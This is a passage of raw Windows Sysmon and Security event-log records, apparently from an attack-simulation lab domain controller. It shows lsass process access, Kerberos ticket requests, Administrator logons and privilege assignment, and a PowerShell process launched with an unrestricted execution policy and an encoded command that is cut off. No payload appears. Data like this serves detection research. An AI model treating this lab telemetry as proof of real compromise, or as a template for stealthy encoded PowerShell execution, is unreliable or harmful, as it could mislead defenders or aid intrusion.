C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.817","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220462,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220463,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220464,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220465,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68A42\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8E2B88AF-627C-DE1E-E19E-166FF563264F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x68a42","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8E2B88AF-627C-DE1E-E19E-166FF563264F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220466,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68A42\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x68a42","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.887\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nProcessId: 4840\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nParentProcessId: 1576\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 